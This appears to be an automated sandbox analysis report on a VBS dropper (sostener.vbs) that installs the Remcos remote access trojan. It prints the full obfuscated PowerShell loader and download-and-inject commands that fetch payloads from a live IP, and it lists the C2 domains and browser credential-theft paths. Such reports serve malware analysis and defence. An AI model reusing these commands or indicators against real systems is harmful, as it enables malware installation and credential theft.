                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??og?v?c8?oq?x?c4?mg?w?di?lg?y?dm?mw?u?de?ng?5?c8?v?bh?gs?lwbs?gu?zw?v?e0?yqby?ho?lwbe?fi?rw?v?fi?v?bd?c8?qqbe?c8?z?bs?gw?lgb0?hg?d??n?c??ow?k?em?wqby?eo?u??g?d0?i??o?c??wwbt?hk?cwb0?gu?bq?u?ek?tw?u?f??yqb0?gg?xq?6?do?rwbl?hq?v?bl?g0?c?bq?ge?d?bo?cg?kq?g?cs?i??n?gq?b?bs?d??mq?u?hq?e?b0?cc?i??p?c??owbj?g4?dgbv?gs?zq?t?fc?zqbi?fi?zqbx?hu?zqbz?hq?i??t?fu?ugbj?c??j?bd?em?ugbo?g0?i??t?e8?dqb0?ey?aqbs?gu?i??k?em?wqby?eo?u??g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?i?bw?g8?dwbl?hi?cwbo?gu?b?bs?c4?zqb4?gu?i??t?gm?bwbt?g0?yqbu?gq?i?b7?c??j?bd?fk?cgbk?f??i??9?c??k??g?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?c??kq?g?ds?j?bn?ec?aqbt?ee?i??9?c??k??g?ec?zqb0?c0?qwbv?g4?d?bl?g4?d??g?c0?u?bh?hq?a??g?cq?qwbz?hi?sgbq?c??kq?g?ds?i?b9?c??ow?k?hg?awbs?gw?a??g?d0?i??n?d??jw?g?ds?j?bi?h??dgby?hy?i??9?c??jw?l?eo?awbr?ge?cwbe?gy?zwby?fq?zw?l?cc?i??7?fs?qgb5?hq?zqbb?f0?xq?g?cq?bqbx?g8?bgbz?c??pq?g?fs?cwb5?hm?d?bl?g0?lgbd?g8?bgb2?gu?cgb0?f0?og?6?ey?cgbv?g0?qgbh?hm?zq?2?dq?uwb0?hi?aqbu?gc?k??g?cg?i?bh?gu?d??t?em?bwbu?hq?zqbu?hq?i??t?f??yqb0?gg?i??k?em?wqby?eo?u??g?ck?lgby?gu?c?bs?ge?ywbl?cg?jw?k?cq?jw?s?cc?qq?n?ck?i??p?c??owbb?fm?eqbz?hq?zqbt?c4?qqbw?h??r?bv?g0?yqbp?g4?xq?6?do?qwb1?hi?cgbl?g4?d?be?g8?bqbh?gk?bg?u?ew?bwbh?gq?k??k?g0?cqbv?g4?cw?p?c4?rwbl?hq?v?b5?h??zq?o?cc?v?bl?gg?dqbs?gm?a?bl?hm?w?b4?fg?e?b4?c4?qwbs?ge?cwbz?de?jw?p?c4?rwbl?hq?tqbl?hq?a?bv?gq?k??n?e0?cwbx?ei?sqbi?fk?jw?p?c4?sqbu?hy?bwbr?gu?k??k?g4?dqbs?gw?l??g?fs?bwbi?go?zqbj?hq?wwbd?f0?i??o?c??jwbk?ee?qg?0?ee?s?br?ee?t?bn?ei?mgbb?ec?o?bb?gi?zwbb?du?qqbe?eu?qqbj?hc?qgb2?ee?s?bn?ee?t?b3?ei?egbb?ec?uqbb?fk?uqbc?hy?qqbh?hc?qqbi?gc?qg?z?ee?rw?4?ee?wgbb?ee?dgbb?eq?awbb?e0?uqbc?gw?qqbi?ek?qqbz?gc?qgb0?ee?rwbv?ee?yqbr?ei?mgbb?ec?o?bb?gi?zwbb?hy?qqbd?d??qqbm?fe?qq?y?ee?r?bj?ee?tgbr?ee?m?bb?eg?sqbb?gi?dwbc?d??qqbh?e0?qqba?fe?qgbv?ee?qw?4?ee?wgb3?ei?eqbb?ec?o?bb?ew?zwbc?d??qqbh?fu?qqbh?hc?qgbq?ee?s?bv?ee?wqbn?ei?m?bb?ec?awbb?fk?zwbb?hy?qqbd?dg?qqbp?gc?qgb6?ee?s?bb?ee?z?bb?ei?m?bb?ec?zwbb?cc?i??s?c??j?bi?h??dgby?hy?i??s?c??jwbf?f8?xwbf?f8?cwbj?hm?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?hg?awbs?gw?a??s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?c??ow?=';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.replace('%jkqasdfgrtg%', 'c:\users\user\desktop\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'http://91.202.233.169/tak/reg/marz/drg/rtc/ad/dll.txt' ;$cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;invoke-webrequest -uri $ccrhm -outfile $cyrjp -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $cyrjp = ( [system.io.path]::gettemppath() + 'dll01.txt' ) ;$ggima = ( get-content -path $cyrjp ) ; } ;$xkllh = '0' ;$bpvrv = 'c:\users\user\desktop\sostener.vbs' ;[byte[]] $mqons = [system.convert]::frombase64string( ( get-content -path $cyrjp ).replace('$$','a') ) ;[system.appdomain]::currentdomain.load($mqons).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ( 'dab4ahqalgb2ag8abga5adeacwbvahmalwbzagqayqbvagwabgb3ag8azaavadkamqblahiaygbtaguaaqb2ag8abgavac0alqa2adcanqa0ahiabwb0agmazqboac8azwbyag8algb0aguaawbjahuaygb0agkaygavac8aogbzahaadab0agga' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'roda' )) ;"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand iaakaemawqbyaeoauaagad0aiaaoacaawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accaiaapacaaowakagcarwbpag0aqqagad0aiaaoacaarwblahqalqbdag8abgb0aguabgb0acaalqbqageadaboacaajabdafkacgbkafaaiaapacaaowagaa== -inputformat xml -outputformat textJump to behavior
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\VMf
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\13<M
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\}M{
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\k`M
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\M
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\21
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDMt
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\k
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\*MJ
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\#MQ
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001196000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\XMX
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.00000000011CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerUG\QM_
                  Source: AddInProcess32.exe, 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, registros.dat.15.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00433E0A cpuid 15_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,15_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,15_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,15_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,15_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_00450D42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,15_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00450E6A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00404915 GetLocalTime,CreateEventA,CreateThread,15_2_00404915
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041A7A2 GetComputerNameExW,GetUserNameW,15_2_0041A7A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_0044800F
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040B21B
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db15_2_0040B335

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0883UGJump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe15_2_00405042

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts1
                  Native API                  		121
                  Scripting                  		1
                  DLL Side-Loading                  		111
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services12
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		4
                  Obfuscated Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol211
                  Input Capture                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts3
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Software Packing                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell                  		Network Logon Script222
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets33
                  System Information Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials21
                  Security Software Discovery                  		VNCGUI Input Capture213
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                  System Network Configuration Discovery                  		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559185 Sample: sostener.vbs Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 34 remcosnov24.duckdns.org 2->34 36 s3-w.us-east-1.amazonaws.com 2->36 38 4 other IPs or domains 2->38 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 68 15 other signatures 2->68 9 wscript.exe 1 2->9         started        signatures3 66 Uses dynamic DNS services 34->66 process4 signatures5 78 Suspicious powershell command line found 9->78 80 Wscript starts Powershell (via cmd or directly) 9->80 82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->82 84 Suspicious execution chain found 9->84 12 powershell.exe 7 9->12         started        process6 signatures7 86 Suspicious powershell command line found 12->86 88 Encrypted powershell cmdline option found 12->88 90 Uses ping.exe to check the status of other devices and networks 12->90 92 Found suspicious powershell code related to unpacking or dynamic code loading 12->92 15 powershell.exe 14 17 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 46 91.202.233.169, 49699, 49726, 80 M247GB Russian Federation 15->46 48 bitbucket.org 185.166.143.49, 443, 49737 AMAZON-02US Germany 15->48 50 s3-w.us-east-1.amazonaws.com 52.217.196.57, 443, 49747 AMAZON-02US United States 15->50 52 Encrypted powershell cmdline option found 15->52 54 Writes to foreign memory regions 15->54 56 Potential dropper URLs found in powershell memory 15->56 58 Injects a PE file into a foreign processes 15->58 21 AddInProcess32.exe 3 15 15->21         started        26 PING.EXE 1 15->26         started        28 powershell.exe 11 15->28         started        30 cmd.exe 1 15->30         started        signatures10 process11 dnsIp12 40 remcosnov24.duckdns.org 190.9.223.135, 4576, 49759 EPMTelecomunicacionesSAESPCO Colombia 21->40 42 geoplugin.net 178.237.33.50, 49769, 80 ATOM86-ASATOM86NL Netherlands 21->42 32 C:\ProgramData\remcos\registros.dat, data 21->32 dropped 70 Contains functionality to bypass UAC (CMSTPLUA) 21->70 72 Detected Remcos RAT 21->72 74 Contains functionalty to change the wallpaper 21->74 76 5 other signatures 21->76 44 127.0.0.1 unknown unknown 26->44 file13 signatures14

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  sostener.vbs21%ReversingLabsWin32.Trojan.Honolulu

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt100%Avira URL Cloudmalware
                  http://91.202.233.1690%Avira URL Cloudsafe
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt100%Avira URL Cloudmalware
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A0%Avira URL Cloudsafe
                  remcosnov24.duckdns.org0%Avira URL Cloudsafe
                  https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
                  http://crl.veris0%Avira URL Cloudsafe
                  https://bbuseruploads.s3.amazohj60%Avira URL Cloudsafe
                  http://91.202.H0%Avira URL Cloudsafe
                  http://91.202.0%Avira URL Cloudsafe
                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  s3-w.us-east-1.amazonaws.com
                  		52.217.196.57
                  		truefalse
                    		high
                    bitbucket.org
                    		185.166.143.49
                    		truefalse
                      		high
